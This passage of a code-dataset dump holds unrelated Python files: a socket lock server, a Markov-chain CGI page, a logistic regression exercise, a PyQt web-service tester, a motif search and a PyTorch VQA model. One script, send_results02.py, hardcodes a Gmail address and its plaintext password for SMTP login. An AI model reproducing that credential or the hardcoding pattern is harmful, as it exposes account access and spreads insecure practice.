self.csocket.send(bytes(msg,'UTF-8'))\n\n else:\n print (\"wrong format\", msg)\n msg = \"Wrong format for message, you should have lock/unlock x \"\n 
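# send usage guidance back to the client so it can retry with a valid request\n                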
self.csocket.send(bytes(msg,'UTF-8'))\n \n \n print (\"Client at \", self.clientAddress, \" disconnected...\") \n\n\nnumber_of_locks = 5\nlocks = ['0','1','2','3','4']\n\nLOCALHOST = \"127.0.0.1\"\nPORT = 8080\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver.bind((LOCALHOST, PORT))\nprint(\"Server started\")\n\ninstance_results_sent_log = set()\n \n\nclient_dict = {}\n\nsystem = System(SystemConfig(5))\nsystem.start()\n\n \nprint(\"Waiting for client request..\")\ncommunicationthread = CommunicationThread()\ncommunicationthread.start()\n\nwhile True:\n server.listen(1)\n clientsock, clientAddress = server.accept()\n client_dict[clientAddress[1]] = clientsock\n newthread = ClientThread(clientAddress, clientsock)\n newthread.start()\n\n \nsystem.shutdown_agents()\nsystem.logger.print_results()\n\n\nsystem.quit()\n","sub_path":"lockserver.py","file_name":"lockserver.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"544798156","text":"#Min-Max elements from given array using minimum no. of comaparisons\r\ndef getminmax(low,high,arr):\r\n if low == high: #if single element is present\r\n arr_max = arr[low]\r\n arr_min = arr[low]\r\n return (arr_min,arr_max)\r\n\r\n elif high == low+1: #if two elements are present\r\n if arr[low]>arr[high]:\r\n arr_min = arr[high]\r\n arr_max = arr[low]\r\n else:\r\n arr_min = arr[low]\r\n arr_max = arr[high]\r\n return (arr_min,arr_max)\r\n\r\n else: #more than 2 elements\r\n mid = int((low+high)/2)\r\n arr_min1,arr_max1 = getminmax(low,mid,arr)\r\n arr_min2,arr_max2 = getminmax(mid+1,high,arr)\r\n return (min(arr_min1,arr_min2),max(arr_max1,arr_max2))\r\n\r\narr = [12,34,54,28,62]\r\nprint (getminmax(0,len(arr)-1,arr))\r\n\r\n","sub_path":"Data_structures/Min-max_array.py","file_name":"Min-max_array.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"403712829","text":"\"\"\"\n If you want\n\"\"\"\n\nfrom collections import namedtuple\n\nfrom transfert.url import Url\nfrom transfert.resources._resource import _Resource\n\nfrom pkg_resources import get_distribution, DistributionNotFound\nimport os.path\n\ntry:\n _dist = get_distribution('transfert')\n # Normalize case for Windows systems\n dist_loc = os.path.normcase(_dist.location)\n here = os.path.normcase(__file__)\n if not here.startswith(os.path.join(dist_loc, 'transfert')):\n # not installed, but there is another version that *is*\n raise DistributionNotFound\nexcept DistributionNotFound:\n __version__ = 'Please install this project with setup.py'\nelse:\n __version__ = _dist.version\n\nSizeInfo = namedtuple('SizeInfo', ['current', 'total', 'last_chunk'])\nResource = _Resource.from_url\n","sub_path":"transfert/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"575818992","text":"import logging\nimport sys\n\n\nformat = \"%(asctime)-15s %(threadName)s %(module)s %(funcName)s %(lineno)d %(message)s\"\n\nlogging.basicConfig(format=format, stream=sys.stderr, level=logging.DEBUG)\ndb_log = logging.getLogger(__name__)\n\nfor handler in logging.root.handlers:\n 
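# logging.Filter(name) passes only records whose logger name starts with that\n    # prefix, so the root handlers emit just this module's messages\n    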
handler.addFilter(logging.Filter(__name__))","sub_path":"db_code/log_manager.py","file_name":"log_manager.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"31912543","text":"#!/usr/bin/python\n\nimport cgi\nimport cgitb\ncgitb.enable()\n\nprint('HTTP/1.0 200 OK')\nprint('Content-Type: text/html;charset=utf-8')\nprint()\n\nform = cgi.FieldStorage()\n\nprint('''\n
<html>\n<head><title>Markov Chain Simulator</title></head>\n<body>\n<p>Use the bottom two rows for absorbing states</p>\n<!-- reconstructed form markup: a 5x5 grid of transition-probability fields named 00..44, matching the form keys read below -->\n<form method='post'>\n<input name='00'> <input name='01'> <input name='02'> <input name='03'> <input name='04'> <br>\n<input name='10'> <input name='11'> <input name='12'> <input name='13'> <input name='14'> <br>\n<input name='20'> <input name='21'> <input name='22'> <input name='23'> <input name='24'> <br>\n<input name='30'> <input name='31'> <input name='32'> <input name='33'> <input name='34'> <br>\n<input name='40'> <input name='41'> <input name='42'> <input name='43'> <input name='44'> <br>\n<input type='submit'>\n</form>
\n''')\n\nimport numpy as np\nimport math\n\ndef mean_number_of_passages(Q, num_transient_states):\n return np.linalg.inv(np.subtract(np.identity(num_transient_states), Q))\n\ndef mean_time_to_absorption(W, num_transient_states):\n return W.dot(np.ones((num_transient_states, 1)))\n\ndef prob_of_absorption(W, R):\n return W.dot(R)\n\nif len(form.keys()) == 25:\n if (float(form['00'].value) + float(form['01'].value) + float(form['02'].value) + float(form['03'].value) + float(form['04'].value) == 1) and (float(form['10'].value) + float(form['11'].value) + float(form['12'].value) + float(form['13'].value) + float(form['14'].value) == 1) and (float(form['20'].value) + float(form['21'].value) + float(form['22'].value) + float(form['23'].value) + float(form['24'].value) == 1) and (float(form['30'].value) + float(form['31'].value) + float(form['32'].value) + float(form['33'].value) + float(form['34'].value) == 1) and (float(form['40'].value) + float(form['41'].value) + float(form['42'].value) + float(form['43'].value) + float(form['44'].value) == 1):\n Q = np.array([[float(form['00'].value), float(form['01'].value), float(form['02'].value)],\n [float(form['10'].value), float(form['11'].value), float(form['12'].value)],\n [float(form['20'].value), float(form['21'].value), float(form['22'].value)]])\n R = np.array([[float(form['03'].value), float(form['04'].value)],\n [float(form['13'].value), float(form['14'].value)],\n [float(form['23'].value), float(form['24'].value)]])\n else:\n print('
<br>Rows do not add up to 1, using default matrix instead.<br>')\n        Q = np.array([[float(0.2970), float(0.3960), float(0.0990)],\n                      [float(0.1515), float(0.3030), float(0.3030)],\n                      [float(0.1176), float(0.1176), float(0.1176)]])\n        R = np.array([[float(0.1980), float(0.0100)],\n                      [float(0.2273), float(0.0152)],\n                      [float(0.5882), float(0.0590)]])\nelse:\n    print('<br>All boxes are not filled in, using default matrix instead.<br>')\n    Q = np.array([[float(0.2970), float(0.3960), float(0.0990)],\n                  [float(0.1515), float(0.3030), float(0.3030)],\n                  [float(0.1176), float(0.1176), float(0.1176)]])\n    R = np.array([[float(0.1980), float(0.0100)],\n                  [float(0.2273), float(0.0152)],\n                  [float(0.5882), float(0.0590)]])\n\n# results are emitted as simple <br>-separated HTML (markup reconstructed)\npartA = mean_number_of_passages(Q, 3)\nprint('<br>Mean number of passages over transient state j starting at transient state i:<br>')\nprint('<br>{}<br>'.format(partA[0]))\nprint('<br>{}<br>'.format(partA[1]))\nprint('<br>{}<br>'.format(partA[2]))\npartB = mean_time_to_absorption(partA, 3)\nprint('<br>Mean time to absorption starting at transient state i:<br>')\nprint('<br>{}<br>'.format(partB[0]))\nprint('<br>{}<br>'.format(partB[1]))\nprint('<br>{}<br>'.format(partB[2]))\npartC = prob_of_absorption(partA, R)\nprint('<br>Probability of absorption to absorbing state k:<br>')\nprint('<br>{}<br>'.format(partC[0]))\nprint('<br>{}<br>'.format(partC[1]))\nprint('<br>{}<br>
'.format(partC[2]))\n\n","sub_path":"www/scripts/markov_chain.py","file_name":"markov_chain.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"475470818","text":"# Import Statements\nimport zipfile, os, sys\nimport poplib, getpass, email, smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\nfrom email import encoders\n\n# Email Account Details\nu = 'fpaabot.dev2@gmail.com'\nup = 'cadsp_fpaa'\n\n# Process Command Line Arguments\nif (len(sys.argv) == 3):\n users_email = str(sys.argv[1])\n file_name = str(sys.argv[2])\n print(users_email)\n print(file_name)\nelse:\n sys.exit(\"user email or results file not provided\")\n\n# Compose email ...\nfromaddr = \"fpaabot.dev@gmail.com\"\ntoaddr = users_email\nmsg = MIMEMultipart()\nmsg['From'] = fromaddr\nmsg['To'] = toaddr\n\ntry:\n f1_watch='WATCHDOG.txt'\n FILE=open(f1_watch,'r')\n if FILE.read()=='1':\n print('I am inside watchdog area')\n msg['Subject'] = \"Run time execution over 3 minutes\"\n body = \"You just put the remote system in a loop!!!It had to reset itself.\\nFor Debugging:\\nIf you are using a long input vector, for now the remote system is constrained to 500 points.\\nCheck if you are using the right chip num(01 and 13) and board num(3.0).\\nIf you are using RAMP ADC its input voltage range is 0.2 to 1.8 Volts.\\nOther things hmm. Maybe check the sampling rate of the DAC and the ADC. Sampling rate is the time between two point. So if Sampling rate is 200 Hz then it will wait for 5ms to measure each point.\"\n else:\n msg['Subject'] = \"Results\"\n body = \".\"\n FILE.close() \nexcept:\n\tmsg['Subject'] = \"Results\"\n\tbody = \".\" \n\t\nmsg.attach(MIMEText(body, 'plain'))\ntry:\n part = MIMEBase('application', \"octet-stream\")\n part.set_payload( open(file_name,\"rb\").read() )\n encoders.encode_base64(part)\n part.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % os.path.basename(file_name))\n msg.attach(part)\nexcept:\n print ('Failed to attach zipped file!')\n\n# Send email ...\ns = smtplib.SMTP('smtp.gmail.com', 587)\ns.ehlo()\ns.starttls()\ns.login(u, up)\ns.sendmail(fromaddr, toaddr, msg.as_string())\ns.quit()\n","sub_path":"remote_server/send_results02.py","file_name":"send_results02.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"6594028","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport scipy\n#from PIL import Image\nfrom scipy import ndimage\nfrom lr_utils import load_dataset\n\n\n#example of a picture\ntrain_set_x_orig,train_set_y,test_set_x_orig,test_set_y,classes = \\\n load_dataset()\n'''index = 25\nplt.figure()\nplt.imshow(train_set_x_orig[index])\nprint(\"y = \" + str(train_set_y[:,index]) + \",it's a \" + \n classes[np.squeeze(train_set_y[:,index])].decode(\"utf-8\") + \"'\\\n picture.\")\nplt.show()\n'''\n\nnum_px = train_set_x_orig.shape[1]\n\n#reshape the training and test examples\ntrain_set_x_flatten = \\\n train_set_x_orig.reshape(train_set_x_orig.shape[0],-1).T\ntest_set_x_flatten = \\\n test_set_x_orig.reshape(test_set_x_orig.shape[0],-1).T\n''' \nprint(\"train_set_x_flatten shape:\" + str(train_set_x_flatten.shape))\nprint(\"train_set_y shape\" + str(train_set_y.shape))\nprint(\"test_set_x_flatten shape:\" + 
str(test_set_x_flatten.shape))\nprint(\"test_set_y shape\" + str(test_set_y.shape))\n'''\n\n#standardize our dataset\ntrain_set_x = train_set_x_flatten / 255\ntest_set_x = test_set_x_flatten / 255\n\ndef sigmoid(z):\n s = 1/(1+np.exp(-z))\n return s\n\ndef initialize_with_zeros(dim):\n '''\n argument:\n dim -- the size of w vector\n returns:\n w -- initialized weight vector with (dim,1)\n b -- initialized bias\n '''\n w = np.zeros((dim,1))\n b = 0\n \n #check the dimentions are correct\n assert(w.shape == (dim,1))\n assert(isinstance(b,float) or isinstance(b,int))\n \n return w,b\n\ndef propagate(w,b,X,Y):\n '''\n w -- weights ,a numpy array of size(num_px * num_px * 3,1)\n b -- bias\n X -- data of size(num_px * num_px * 3,number of examples)\n Y -- label vector of size (1,number of examples)\n '''\n m = X.shape[1]\n \n #forward propagate\n A = sigmoid(np.dot(w.T,X)+b)\n cost = -(np.dot(Y,np.log(A.T))+np.dot(np.log(1-A),(1-Y).T)) / m\n \n #backward propagate\n dw = np.dot(X,(A-Y).T) / m\n db = np.sum(A-Y) / m\n \n #check these parameters\n assert(dw.shape == w.shape)\n assert(db.dtype == float)\n cost = np.squeeze(cost)\n assert(cost.shape == ())\n \n grads = {\"dw\": dw,\n \"db\": db}\n return grads,cost \n \ndef optimize(w,b,X,Y,num_iterations,learning_rate,print_cost = False):\n \"\"\"\n this function optimizes w and b by runing a gradient descent method\n argument:\n w -- weights ,a numpy array of size(num_px * num_px * 3,1)\n b -- bias\n X -- data of size(num_px * num_px * 3,number of examples)\n Y -- label vector of size (1,number of examples)\n num_iterations -- number of iterations of the optimization loop\n learnig_rate -- funtions is the same as it's name\n print_cost -- True to print cost every 100 iterations\n returns:\n params -- dictionary contains weights w and b\n grads -- dictionary contains dw and db with the respect cost\n costs -- list of all costs every 100 steps\n \"\"\" \n \n costs = []\n \n for i in range(num_iterations):\n #get the grads and cost from propagate\n grads,cost = propagate(w,b,X,Y)\n \n dw = grads[\"dw\"]\n db = grads[\"db\"]\n \n #update the params w,b\n w = w - learning_rate * dw\n b = b - learning_rate * db\n \n #every 100 iterations record the cost\n if i % 100 == 0:\n costs.append(cost)\n \n #decide whether to print cost or not\n if print_cost and i % 100 == 0:\n print(\"Cost after iteration %i: %f\"%(i,cost))\n \n #package the return value we need \n params = {\"w\": w,\n \"b\": b}\n \n grads = {\"dw\": dw,\n \"db\": db}\n \n return params,grads,costs \n\ndef predict(w,b,X):\n '''\n argumenr:\n w -- weights,numpy array of size(num_px * num_px *3,1)\n b -- bias\n X -- data of size(num_px * num_px * 3,number of examples)\n return:\n Y_prediction -- prediction,a numpy array of size(1,number of examples)\n '''\n m = X.shape[1]\n Y_prediction = np.zeros((1,m))\n w = w.reshape(X.shape[0],1)\n \n A = sigmoid(np.dot(w.T,X) + b)\n \n for i in range(A.shape[1]):\n if A[0][i] <= 0.5:\n A[0][i] = 0\n else:\n A[0][i] = 1\n Y_prediction = A\n \n assert(Y_prediction.shape == (1,m))\n \n return Y_prediction\n \ndef model(X_train,Y_train,X_test,Y_test,num_iterations = 2000,\\\n learning_rate = 0.5,print_cost = True):\n '''\n X_train -- training set,numpy array of size(num_px*num_px*3,m_train)\n Y_train -- training labels,numpy array of size(1,m_train)\n X_test -- test set,numpy array of size(num_px*num_px*3,m_test)\n Y_test -- test labels,numpy array of size(1,m_test)\n num_iterations -- \n learning_rate -- \n print_cost -- \n \n returns:\n d -- dictionary 
containing information about the model\n '''\n #initialize the parameters\n w,b = initialize_with_zeros(X_train.shape[0])\n \n #run the gradient decent and get the weights and bias\n parameters,grads,costs = optimize(w,b,X_train,Y_train,\\\n num_iterations,learning_rate,print_cost)\n \n w = parameters[\"w\"]\n b = parameters[\"b\"]\n \n #make predictions in the training set and test set\n Y_prediction_test = predict(w,b,X_test)\n Y_prediction_train = predict(w,b,X_train)\n \n #visualize the accuracy\n print(\"train accuracy: {}%\".format(100 - \\\n np.mean(np.abs(Y_prediction_train - Y_train)) * 100))\n print(\"test accuracy: {}%\".format(100 - \\\n np.mean(np.abs(Y_prediction_test - Y_test)) * 100))\n \n #get the informations in this model \n d = {\"costs\":costs,\n \"Y_prediction_test\":Y_prediction_test,\n \"Y_prediction_train\":Y_prediction_train,\n \"w\":w,\n \"b\":b,\n \"learning_rate\":learning_rate,\n \"num_iterations\":num_iterations}\n \n return d\n\nd = model(train_set_x,train_set_y,test_set_x,test_set_y,\\\n num_iterations = 2000,learning_rate = 0.005,print_cost = True)\n\n#visualize the cost under a fixed learning_rate\n'''\ncosts = np.squeeze(d['costs'])\nplt.plot(costs)\nplt.ylabel('cost')\nplt.xlabel('iterations(per hundreds)')\nplt.title(\"Learning rate =\" + str(d[\"learning_rate\"]))\nplt.show()\n'''\n\nmy_image = \"test.jpg\"\nfname = \"images/\" + my_image\nimage = np.array(ndimage.imread(fname,flatten=False))\nmy_image = scipy.misc.imresize(image,size=(num_px,num_px)).reshape((1,num_px*\n num_px*3)).T\nprint(str(num_px))\nprint(\"my_image shape is:\" + str(my_image.shape))\nmy_predicted_image = predict(d[\"w\"],d[\"b\"],my_image)\n\nplt.figure()\nplt.imshow(image)\nplt.show()\nprint(\"y = \" + str(np.squeeze(my_predicted_image)) + \" , your algorithm\\\n predicts a \\\"\" + \n classes[int(np.squeeze(my_predicted_image))].decode(\"utf-8\") + \"\\\n picture.\")\n","sub_path":"logisitic.py","file_name":"logisitic.py","file_ext":"py","file_size_in_byte":6802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"103026416","text":"\nimport itertools\n\n\ndef eachPattern(k):\n patterns = []\n each = itertools.product('ATGC', repeat=k)\n for i in each:\n tmp = ''.join(i)\n patterns.append(tmp)\n return patterns\n\n\ndef difference(pat1, pat2):\n if (pat1 == pat2):\n return 0\n tmp = 0\n i = 0\n for j in pat1:\n if j != pat2[i]:\n tmp += 1\n i += 1\n return tmp\n\n\ndef MotifEnumeration(DNA, k, d):\n patterns = []\n out = []\n count = 0\n for str in DNA:\n for i in range(len(str) - k):\n eachpatterns = eachPattern(k)\n for tmp in eachpatterns:\n diff = difference(str[i:i + k ], tmp)\n if diff <= d:\n count = 0\n for strr in DNA:\n for j in range(len(str) - k + 1):\n if difference(tmp, strr[j:j + k]) <= d:\n count += 1\n break\n if count == len(DNA):\n patterns.append(tmp)\n patterns.sort()\n for x in patterns:\n if (not x in out):\n out.append(x)\n out = ' '.join(out)\n return out\n\n\na = input()\na = a.split()\nDNA = []\n\nk = int(a[0])\nd = int(a[1])\n\nfor i in range(k):\n DNA.append(input())\n\nprint(MotifEnumeration(DNA, k, d))","sub_path":"task 4/4.1 Motif Enumeration Problem.py","file_name":"4.1 Motif Enumeration Problem.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"365620887","text":"import sys\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import QIcon\r\nfrom PyQt5.QtCore import pyqtSlot\r\n\r\n#from 
root.nested.wst import Wst\r\n\r\nfrom wst import Wst\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\n\r\nimport traceback\r\nimport time\r\n\r\n\r\n \r\nclass App(QMainWindow):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n self.title = 'WEB SERVICES TEST TOOL'\r\n self.left = 50\r\n self.top = 50\r\n self.width = 640\r\n self.height = 400\r\n \r\n #create GUI\r\n self.initUI() \r\n \r\n \r\n def initUI(self):\r\n #window setting\r\n self.setWindowTitle(self.title)\r\n self.setGeometry(self.left, self.top, self.width, self.height)\r\n \r\n #file menu\r\n mainMenu = self.menuBar() \r\n fileMenu = mainMenu.addMenu('File')\r\n editMenu = mainMenu.addMenu('Edit')\r\n viewMenu = mainMenu.addMenu('View')\r\n searchMenu = mainMenu.addMenu('Search')\r\n toolsMenu = mainMenu.addMenu('Tools')\r\n helpMenu = mainMenu.addMenu('Help')\r\n \r\n exitButton = QAction(QIcon('exit24.png'), 'Exit', self)\r\n exitButton.setShortcut('Ctrl+Q')\r\n exitButton.setStatusTip('Exit application')\r\n exitButton.triggered.connect(self.close)\r\n fileMenu.addAction(exitButton)\r\n \r\n browseButton = QAction(QIcon('exit24.png'), 'Browser', self)\r\n browseButton.setShortcut('Ctrl+B')\r\n browseButton.setStatusTip('Open browser')\r\n browseButton.triggered.connect(self.test_browser)\r\n toolsMenu.addAction(browseButton) \r\n \r\n #main window components\r\n centralWidget = MainWindow() \r\n self.setCentralWidget(centralWidget) \r\n \r\n self.statusBar()\r\n \r\n self.show()\r\n \r\n def test_browser(self):\r\n try: \r\n wst = Wst()\r\n wst.popuniKladionicu()\r\n except:\r\n print(\"Unexpected error:\", sys.exc_info()[0]) \r\n \r\n \r\nclass MainWindow(QWidget):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n \r\n \r\n def initUI(self):\r\n self.createGridLayout()\r\n \r\n windowLayout = QVBoxLayout()\r\n windowLayout.addWidget(self.horizontalGroupBox)\r\n self.setLayout(windowLayout)\r\n \r\n \r\n def createGridLayout(self): \r\n self.horizontalGroupBox = QGroupBox(\"\")\r\n \r\n self.title = QLabel('Title')\r\n self.urlLabel = QLabel('URL')\r\n self.resLabel = QLabel('Response')\r\n self.titleEdit = QLineEdit()\r\n self.urlEdit = QLineEdit()\r\n self.urlEdit.setText(\"http://api.football-data.org/v1/competitions/467/teams\") \r\n self.responseEdit = QTextEdit() \r\n self.getButton = QPushButton(\"GET\") \r\n self.getButton.clicked.connect(self.get_clicked)\r\n self.cancelButton = QPushButton(\"Cancel\") \r\n \r\n \r\n grid = QGridLayout()\r\n grid.setSpacing(10)\r\n\r\n grid.addWidget(self.title, 1, 0)\r\n grid.addWidget(self.titleEdit, 1, 1)\r\n\r\n grid.addWidget(self.urlLabel, 2, 0)\r\n grid.addWidget(self.urlEdit, 2, 1)\r\n\r\n grid.addWidget(self.resLabel, 3, 0)\r\n grid.addWidget(self.responseEdit, 3, 1, 5, 1)\r\n \r\n hbox = QHBoxLayout()\r\n hbox.addStretch(1)\r\n hbox.addWidget(self.getButton)\r\n hbox.addWidget(self.cancelButton)\r\n \r\n grid.addLayout(hbox, 9, 1) \r\n\r\n self.horizontalGroupBox.setLayout(grid)\r\n \r\n self.show()\r\n \r\n #call and get response from web service \r\n def get_clicked(self):\r\n try: \r\n self.responseEdit.setText(\"\")\r\n wst = Wst()\r\n response = wst.call_ws(self.urlEdit.text())\r\n self.responseEdit.append(response)\r\n except:\r\n print(\"Unexpected error:\", sys.exc_info()[0])\r\n \r\n \r\n \r\n#application entry point \r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = App()\r\n 
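# hand control to the Qt event loop; exec_() blocks until the window closes\r\n    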
sys.exit(app.exec_())","sub_path":"my_project/root/nested/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"197546232","text":"import torch\nimport torch.nn as nn\nfrom attention import Attention, NewAttention\nfrom language_model import WordEmbedding, QuestionEmbedding\nfrom classifier import SimpleClassifier\nfrom fc import FCNet\nimport torch.nn.functional as F\nimport torchvision as tv\nimport utils\nimport numpy as np\n\nclass vgg16_modified(nn.Module):\n def __init__(self):\n super(vgg16_modified, self).__init__()\n vgg = tv.models.vgg16(pretrained=True)\n self.vgg_features = vgg.features\n\n def rep_size(self):\n return 1024\n\n def base_size(self):\n return 512\n\n def forward(self,x):\n #return self.dropout2(self.relu2(self.lin2(self.dropout1(self.relu1(self.lin1(self.vgg_features(x).view(-1, 512*7*7)))))))\n features = self.vgg_features(x)\n\n return features\n\n\nclass TopDown(nn.Module):\n def __init__(self,\n vocab_size,\n embed_hidden=300,\n mlp_hidden=512):\n super(TopDown, self).__init__()\n\n self.vocab_size = vocab_size\n\n self.verb_transform = nn.Linear(embed_hidden, mlp_hidden)\n self.v_att = NewAttention(mlp_hidden, mlp_hidden, mlp_hidden)\n '''self.q_net = FCNet([mlp_hidden, mlp_hidden])\n self.v_net = FCNet([mlp_hidden, mlp_hidden])\n self.classifier = SimpleClassifier(\n mlp_hidden, 2 * mlp_hidden, self.vocab_size, 0.5)'''\n self.classifier = nn.Sequential(\n nn.Linear(mlp_hidden * 7 *7 + mlp_hidden, mlp_hidden*8),\n nn.BatchNorm1d(mlp_hidden*8),\n nn.ReLU(inplace=True),\n nn.Dropout(0.5),\n nn.Linear(mlp_hidden * 8, mlp_hidden),\n nn.BatchNorm1d(mlp_hidden),\n nn.ReLU(inplace=True),\n nn.Dropout(0.5),\n )\n\n\n def forward(self, img, q_emb):\n batch_size = img.size(0)\n\n att = self.v_att(img, q_emb)\n v_emb = (att * img)\n v_emb = v_emb.permute(0, 2, 1)\n v_emb = v_emb.contiguous().view(-1, 512*7*7)\n v_emb_with_q = torch.cat([v_emb, q_emb], -1)\n logits = self.classifier(v_emb_with_q)\n\n return logits\n\nclass BaseModel(nn.Module):\n def __init__(self, encoder,\n gpu_mode,\n embed_hidden=300,\n mlp_hidden=512):\n super(BaseModel, self).__init__()\n\n self.normalize = tv.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n\n self.train_transform = tv.transforms.Compose([\n tv.transforms.RandomRotation(10),\n tv.transforms.RandomResizedCrop(224),\n tv.transforms.RandomHorizontalFlip(),\n tv.transforms.ToTensor(),\n self.normalize,\n ])\n\n self.dev_transform = tv.transforms.Compose([\n tv.transforms.Resize(224),\n tv.transforms.CenterCrop(224),\n tv.transforms.ToTensor(),\n self.normalize,\n ])\n\n self.encoder = encoder\n self.gpu_mode = gpu_mode\n self.n_roles = self.encoder.get_num_roles()\n self.n_verbs = self.encoder.get_num_verbs()\n self.vocab_size = self.encoder.get_num_labels()\n self.max_role_count = self.encoder.get_max_role_count()\n self.n_role_q_vocab = len(self.encoder.question_words)\n self.det_obj_label_count = self.encoder.total_det_objcount\n\n self.conv = vgg16_modified()\n self.verb_lookup = nn.Embedding(self.n_verbs, embed_hidden)\n self.w_emb = nn.Embedding(self.n_role_q_vocab + 1, embed_hidden, padding_idx=self.n_role_q_vocab)\n self.q_emb1 = nn.LSTM(embed_hidden, mlp_hidden,\n batch_first=True, bidirectional=True)\n self.lstm_proj1 = nn.Linear(mlp_hidden * 2, mlp_hidden)\n self.q_emb2 = nn.LSTM(mlp_hidden, mlp_hidden,\n batch_first=True, bidirectional=True)\n self.lstm_proj2 = 
nn.Linear(mlp_hidden * 2, mlp_hidden)\n self.roles = TopDown(self.vocab_size)\n self.last_class = nn.Linear(mlp_hidden, self.vocab_size)\n\n self.conv_hidden = self.conv.base_size()\n self.mlp_hidden = mlp_hidden\n self.embed_hidden = embed_hidden\n self.dropout = nn.Dropout(0.3)\n self.num_steps = 2\n\n def train_preprocess(self):\n return self.train_transform\n\n def dev_preprocess(self):\n return self.dev_transform\n\n def forward(self, img_id, img, verb):\n\n img_features = self.conv(img)\n batch_size, n_channel, conv_h, conv_w = img_features.size()\n img = img_features.view(batch_size, n_channel, -1)\n img = img.permute(0, 2, 1)\n\n img_updated = img\n\n img_updated = img_updated.expand(self.max_role_count,img_updated.size(0), img_updated.size(1), img_updated.size(2))\n img_updated = img_updated.transpose(0,1)\n img_updated = img_updated.contiguous().view(batch_size* self.max_role_count, -1, self.mlp_hidden)\n verb_embd = self.verb_lookup(verb)\n verb_embed_expand = verb_embd.expand(self.max_role_count, verb_embd.size(0), verb_embd.size(1))\n verb_embed_expand = verb_embed_expand.transpose(0,1)\n verb_embed_expand = verb_embed_expand.contiguous().view(-1, self.embed_hidden)\n\n role_qs, _ = self.encoder.get_role_questions_batch(verb)\n if self.gpu_mode >= 0:\n role_qs = role_qs.to(torch.device('cuda'))\n\n\n role_qs = role_qs.view(batch_size*self.max_role_count, -1)\n embed_qs = torch.cat([ self.w_emb(role_qs),verb_embed_expand.unsqueeze(1)],1)\n self.q_emb1.flatten_parameters()\n lstm_out, (h, _) = self.q_emb1(embed_qs)\n q_emb = h.permute(1, 0, 2).contiguous().view(batch_size*self.max_role_count, -1)\n q_emb = self.lstm_proj1(q_emb)\n\n rep = self.roles(img_updated, q_emb)\n\n for i in range(self.num_steps):\n\n labelrep = rep.contiguous().view(batch_size, -1, self.mlp_hidden)\n labelrep_expand = labelrep.expand(self.max_role_count, labelrep.size(0), labelrep.size(1), labelrep.size(2))\n labelrep_expand = labelrep_expand.transpose(0,1)\n labelrep_expand_new = torch.zeros([batch_size, self.max_role_count, self.max_role_count-1, self.mlp_hidden])\n for i in range(self.max_role_count):\n if i == 0:\n labelrep_expand_new[:,i] = labelrep_expand[:,i,1:]\n elif i == self.max_role_count -1:\n labelrep_expand_new[:,i] = labelrep_expand[:,i,:i]\n else:\n labelrep_expand_new[:,i] = torch.cat([labelrep_expand[:,i,:i], labelrep_expand[:,i,i+1:]], 1)\n\n if self.gpu_mode >= 0:\n labelrep_expand_new = labelrep_expand_new.to(torch.device('cuda'))\n\n labelrep_expand = labelrep_expand_new.contiguous().view(-1, self.max_role_count-1, self.mlp_hidden)\n\n updated_roleq = torch.cat([labelrep_expand, q_emb.unsqueeze(1)], 1)\n self.q_emb2.flatten_parameters()\n lstm_out, (h, _) = self.q_emb2(updated_roleq)\n q_emb_up = h.permute(1, 0, 2).contiguous().view(batch_size*self.max_role_count, -1)\n q_emb_up = self.lstm_proj2(q_emb_up)\n\n rep2 = self.roles(img_updated, q_emb_up)\n\n rep = rep + self.dropout(rep2)\n #rep = self.rep_proj(torch.cat([rep2, rep], -1))\n\n role_label_pred = self.last_class(rep)\n role_label_pred = role_label_pred.contiguous().view(batch_size, -1, self.vocab_size)\n\n\n return role_label_pred\n\n def calculate_loss(self, gt_verbs, role_label_pred, gt_labels,args):\n\n batch_size = role_label_pred.size()[0]\n if args.train_all:\n loss = 0\n for i in range(batch_size):\n for index in range(gt_labels.size()[1]):\n frame_loss = 0\n #verb_loss = utils.cross_entropy_loss(verb_pred[i], gt_verbs[i])\n #frame_loss = criterion(role_label_pred[i], gt_labels[i,index])\n for j in range(0, 
